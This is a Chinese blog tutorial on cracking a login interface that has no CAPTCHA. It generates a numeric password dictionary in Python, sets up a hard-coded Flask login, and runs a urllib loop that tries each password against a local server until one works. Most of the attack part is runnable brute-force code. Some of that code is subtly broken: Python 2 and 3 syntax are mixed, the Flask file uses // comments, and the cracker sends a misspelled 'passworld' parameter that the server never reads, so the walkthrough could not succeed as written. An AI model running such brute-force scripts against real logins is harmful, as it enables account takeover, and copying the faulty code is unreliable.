破解.jpg
简介
- 任何东西都是双面的,包括程序。(攻击方与防御方,相当于矛与盾)
-
密码字典
所谓的密码字典,主要是配合密码破译软件所使用,密码字典里包括许多人们习惯性设置的密码,这样可以提高密码破译软件的密码破译成功率和命中率,缩短密码破译的时间,当然,如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破译所需要的时间
-
暴力破解(穷举法)
穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。
- 我们这里就是采用 密码字典 来做例子。
文章能教会我们什么呢?
- 本文就是教大家如何使用 密码字典 来破解一个没有加验证码的登录接口。
第一步(生成密码字典文件)
我这里使用的是 Python 来生成的。
先建立一个 .text 的文件
cd xxx(文件夹路径)
vi pass.textPython 中的 string 可以输出所有的字符
import string
print(string.printable)
输出为:0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[]^_`{|}~
我们这里实验就使用 所有数字 组成的集合了。这里我们还用到了 itertools 如果想了解它 请点击我
创建一个 .py 文件 。把下列代码 copy 进去
import sys
import string
import itertools
def get_strings():
chars = string.printable[:10]
strings = []
for i in xrange(min, max + 1):
strings.append((itertools.product(chars, repeat=i),))
return itertools.chain(*strings)
def make_dict():
f = open(file, 'a')
for x in list_str:
for y in x:
f.write("".join(y))
f.write('\n')
f.close()
print()
'Done'
while True:
if len(sys.argv) == 4:
try:
min = int(sys.argv[1])
max = int(sys.argv[2])
except:
print()
"wrong"
sys.exit(0)
if min <= max:
list_str = get_strings()
file = sys.argv[3]
make_dict()
sys.exit(0)
-
然后通过下列代码生成密码字典
python xx.py 6(这个是最短长度) 6(这个是最长长度) .text文件路径(存储路径)
成功后如图所示
密码字典.png
第二步 (编写登录接口)
- 上一篇文章讲过 如何编写接口了,不懂的可以再去看下。
- 我们在之前的基础上加一步验证(这里就省略了和数据库的交互了,而是直接写一个硬编码)
- 代码如下
from flask import Flask
from flask import request
from flask import redirect
from flask import current_app
app = Flask(__name__)
@app.route('/user/login',methods=['GET'])
def start():
// flask 获取 POST 参数
// print(request.form['yes'])
// print(request.form['hai'])
//flask获取 GET 参数
username = request.args.get('username')
passworld = request.args.get('password')
if username == 'w123':
if passworld == '000456':
return 'ok'
else:
return 'error'
else:
return'error'
if __name__ == '__main__':
app.run()
可以看到上述代码 账户名:w123 密码 000456
逻辑 就是 账户密码正确 输出ok 反之error
第三步 (破解)
- 这里我们使用 Python 的 urllib 模块来模拟 请求
- 具体代码如下:
import urllib
import urllib.request
f=open("pass.text")
while 1:
pwd = f.readline().strip()
if not pwd:
print('字典已比对完。')
break
data = {}
data['passworld'] = pwd
data['username'] = 'w123'
url_parame = urllib.parse.urlencode(data)
url = "http://127.0.0.1:5000/user/login?"
all_url = url + url_parame
data = urllib.request.urlopen(all_url).read()
record = data.decode('UTF-8')
if record == 'ok':
print('破解出来了,密码为',pwd)
break
else:
print('error')
附上一张成功的图片
破解成功.png
